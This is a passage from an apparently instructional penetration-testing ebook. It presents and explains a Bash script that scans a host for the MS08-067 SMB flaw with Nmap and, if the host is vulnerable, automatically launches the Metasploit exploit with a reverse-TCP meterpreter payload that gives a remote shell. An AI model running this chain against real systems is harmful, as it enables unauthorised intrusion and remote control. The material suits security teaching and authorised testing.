How to do it...

The example that follows demonstrates how a Bash script can be used to sequence together the tasks of vulnerability scanning and target exploitation. In this case, the smb-vuln-ms08-067.nse script is used to determine whether a system is vulnerable to the MS08-067 attack, 
and then the corresponding Metasploit exploit is executed against the system if it is found 
to be vulnerable:

#! /bin/bash

if [ ! $1 ]; then echo "Usage: #./script <RHOST> <LHOST> <LPORT>"; exit; fi

rhost=$1
lhost=$2
lport=$3

nmap --script smb-vuln-ms08-067.nse -p 445 $rhost --script-args=unsafe=1 -oN tmp_output.txt
if grep -q VULNERABLE: tmp_output.txt; 
 then echo "$rhost appears to be vulnerable, exploiting with Metasploit...";
 msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST $rhost; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST $lhost; set LPORT $lport; run"
fi
rm tmp_output.txt
  1. To ensure that the script's functionality is understood, we will address each line in sequence:
    • The first few lines in the script are the same as the scripts previously discussed in this chapter. The first line defines the interpreter, the second line tests for input, and the third, fourth, and fifth lines are all used to define the variables based on user input.
    • In this script, the supplied user variables correspond to the variables that are used in Metasploit. The RHOST variable should define the IP address of the target, the LHOST variable should define the IP address of the reverse listener, and the LPORT variable should define the local port that is listening.
    • The first task that the script then performs in the body is to execute the smb-vuln-ms08-067.nse script against the IP address of the target system, as defined by the RHOST input.
    • The results of this are then output in normal format to a temporary text file.
    • An if...then conditional statement is then used in conjunction with a grep function to test the output file for a unique string that would indicate that the system is vulnerable. If the unique string is discovered, the script will indicate that the system appears to be vulnerable and will then execute the Metasploit exploit and meterpreter payload using msfconsole -x.
    • Finally, after the exploit is launched, the temporary Nmap output file is removed from the filesystem using the rm function. The test_n_xploit.sh Bash command is executed as follows:
  1. If the script is executed without supplying any arguments, it will output the appropriate usage. This usage description will indicate that the script should be executed with the arguments RHOST, LHOST, and LPORT, in that order. These input values will be used for both the NSE vulnerability scan and, if warranted, the execution of the exploit on the target system using Metasploit.
  2. In the following example, the script is used to determine whether the host at IP address 172.16.69.129 is vulnerable. If the system is determined to be vulnerable, then the exploit will be launched and connected to a reverse TCP meterpreter handler that is listening on the system at IP address 172.16.69.133 on the TCP port 4444:

The preceding output shows that immediately upon completion of the NSE script, the Metasploit exploit module is executed, and an interactive meterpreter shell is returned on 
the target system.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset